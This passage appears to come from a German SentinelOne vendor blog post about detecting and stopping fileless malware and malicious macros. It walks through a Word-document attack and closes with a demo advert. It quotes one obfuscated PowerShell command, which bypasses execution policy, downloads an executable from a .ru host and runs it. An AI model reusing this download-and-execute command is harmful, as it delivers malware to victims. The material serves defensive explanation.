werden die gleichen Einschränkungen durchgesetzt, die Microsoft für Unternehmen anbietet, die ohne Makros auskommen können Makrocode für statische Analysen oder Reputationsprüfungen extrahieren – Dies kann in einigen Fällen funktionieren. Der Nachteil dieses Ansatzes besteht jedoch darin, dass es äußerst schwierig ist, solchen Code innerhalb einer tolerierbaren Falsch-Positiv-Rate zu klassifizieren und zu erkennen, insbesondere bei noch nie dagewesenen bösartigen Makros. Darüber hinaus gibt es nur sehr wenige Repositorys mit gutartigem und bösartigem Code. Eine weitere Option besteht darin, nach typischen Funktionen zu suchen, die bei Angriffen häufig vorkommen, aber auch diese sind variabel und nicht umfassend katalogisiert Serverseitige Erkennung Einige Produkte verwenden nur agentenbasierte Überwachung und treffen die Entscheidung auf dem Server oder in der Cloud. Dieser Ansatz hat die gleichen Nachteile wie jede Erkennung, die nicht am Endpunkt stattfindet. Vor allem erfordert er eine Verbindung, und Prävention ist unmöglich, da der Agent auf die Antwort des Servers warten muss, bevor er handeln kann. Wie man dateilose Malware erkennt Dateilose Malware ist eine der am schwierigsten zu erkennenden Bedrohungen für herkömmliche Antivirensoftware und ältere Cybersicherheitsprodukte, da sie ältere signaturbasierte Erkennungs-, Whitelisting- und Sandboxing-Sicherheitsmethoden umgehen kann. Eine gute Möglichkeit, Ihr Unternehmen vor dateiloser Malware zu schützen, ist ein Threat-Hunting-Team, das aktiv nach Malware sucht. Anzeichen für einen Angriff werden in der Umgebung eines Unternehmens maskiert und vermischt. Es gibt verschiedene Möglichkeiten, wie dies in einem System auftreten kann, und es erfordert ein tiefgreifendes Verständnis der Bedrohungen, um dateilose Malware aufzudecken. Verhalten, nicht Identität Der Schlüssel liegt darin, das Verhalten der auf dem Endpunkt ausgeführten Prozesse zu betrachten, anstatt die Dateien auf dem Rechner zu überprüfen. Dies ist effektiv, da Malware-Varianten trotz ihrer großen und wachsenden Zahl sehr ähnlich funktionieren. Die Anzahl der Malware-Verhaltensweisen ist erheblich geringer als die Anzahl der möglichen Erscheinungsformen einer schädlichen Datei, sodass sich dieser Ansatz für die Prävention und Erkennung eignet. Obwohl SentinelOne mehrere Engines verwendet, darunter statische und verhaltensbasierte KI, eignet sich der verhaltensbasierte Ansatz besonders gut zur Erkennung und Prävention dieser Art von Angriffen, da er unabhängig vom Angriffsvektor ist.Die Wirksamkeit dieses Ansatzes zeigt sich in Beispielen wie der WannaCry Kampagne, bei der SentinelOne Kunden schützen konnte, bevor die Ransomware in freier Wildbahn aufgetaucht war.  Wie SentinelOne dateilose Malware stoppt SentinelOne überwacht alle Aktivitäten auf der Agentenseite auf Kernel-Ebene, um zwischen bösartigen und harmlosen Aktivitäten zu unterscheiden. Da der Agent bereits über den vollständigen Kontext verfügt: Benutzer, Prozesse, Befehlszeilenargumente, Registrierung, Dateien auf der Festplatte und externe Kommunikation, können alle bösartigen Aktivitäten vollständig unterbunden werden. SentinelOne kann alle böswilligen Handlungen rückgängig machen und ermöglicht es dem Benutzer, auf einem sauberen Gerät zu arbeiten. Im Wesentlichen ermöglicht SentinelOne Ihnen, die versteckten Kosten für die Bereinigung Ihres gesamten Netzwerks von schädlichem Code zu vermeiden. Aktive Inhalte Um diesen Ansatz effektiv umzusetzen, verwendet SentinelOne das "StoryLine"-Konzept, das das Problem der Zuordnung der Schuld an die Ursache böswilliger Aktivitäten löst. Nehmen wir beispielsweise an, ein Benutzer lädt über Outlook einen bösartigen Anhang herunter, der dann versucht, Dateien auf der Festplatte zu verschlüsseln. In diesem Szenario würde man die wahre Quelle der bösartigen Aktivität übersehen, wenn man Outlook als übergeordneten Prozess verantwortlich macht und unter Quarantäne stellt. Stattdessen sollte Outlook als Quelle für forensische Daten einbezogen werden, um diese anzuzeigen, aber nicht zu bekämpfen. Sie möchten jedoch die gesamte Bedrohungsgruppe bekämpfen, unabhängig von zusätzlichen Dateien, erstellten Registrierungsschlüsseln oder anderen schädlichen Verhaltensweisen. Mit StoryLine können wir die Ursache eines bestimmten bösartigen Ablaufs mit oder ohne Datei ermitteln und die Schuld dafür zuweisen, sodass der Kunde den Vorfall präzise bearbeiten kann. Erkennung und Abwehr – Schritt für Schritt Sehen wir uns einen Ablauf an, bei dem der Benutzer ein Word-Dokument per verschlüsselter E-Mail erhalten hat. Der Benutzer kennt den Absender und lädt das Dokument daher auf seinen Desktop herunter und öffnet es. Sobald er die Datei öffnet, erhält er Folgendes: Sobald "Ja" angeklickt wird, startet der Angriff. Sehen wir uns an, was der SentinelOne-Agent erkennt (in diesem Beispiel im Erkennungsmodus). Der Administrator kann genau untersuchen, wie jedes Element in dieser Geschichte zum Angriff beigetragen hat. SentinelOne zeigt die genaue Befehlszeile an, die den PowerShell-Befehl aufruft: -ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:UsersadminAppDataRoaming.exE');START-proceSS 'C:UsersadminAppDataRoaming.exE' In einem realen Szenario behebt der SentinelOne-Agent das Problem sofort. Dies geschieht automatisch, ohne dass der Administrator Maßnahmen ergreifen muss. Der Administrator wird per SMS, SIEM oder E-Mail benachrichtigt. Fazit Letztendlich werden Angreifer immer den kürzesten Weg wählen, um Endpunkte zu kompromittieren, um mit möglichst geringem Aufwand den größtmöglichen Gewinn zu erzielen. Dateilose Malware wird schnell zu einer der beliebtesten Methoden, um dies zu erreichen. Um solche Angriffe zu verhindern, reicht es nicht aus, wichtige Vorgänge wie PowerShell zu blockieren. Hier kommt SentinelOne ins Spiel, basierend auf verhaltensbasierter KI-Erkennung und mehrschichtiger Sicherheit, seine Stärken aus – es deckt Exploits, Makrodokumente, Exploit-Kits, PowerShell, PowerSploit und Zero-Day-Schwachstellen , ohne die tägliche Produktivität Ihrer Mitarbeiter zu beeinträchtigen. Fordern Sie eine Demo an und erfahren Sie mehr darüber, wie SentinelOne Sie vor dateiloser Malware und Zero-Day-Angriffen schützen kann!"

Mehr lesen
Sind Sie bereit, Ihre Sicherheitsabläufe zu revolutionieren?

Sind Sie bereit, Ihre Sicherheitsabläufe zu revolutionieren?

Entdecken Sie, wie SentinelOne AI SIEM Ihr SOC in ein autonomes Kraftpaket verwandeln kann. Kontaktieren Sie uns noch heute für eine persönliche Demo und erleben Sie die Zukunft der Sicherheit in Aktion.

Demo anfordern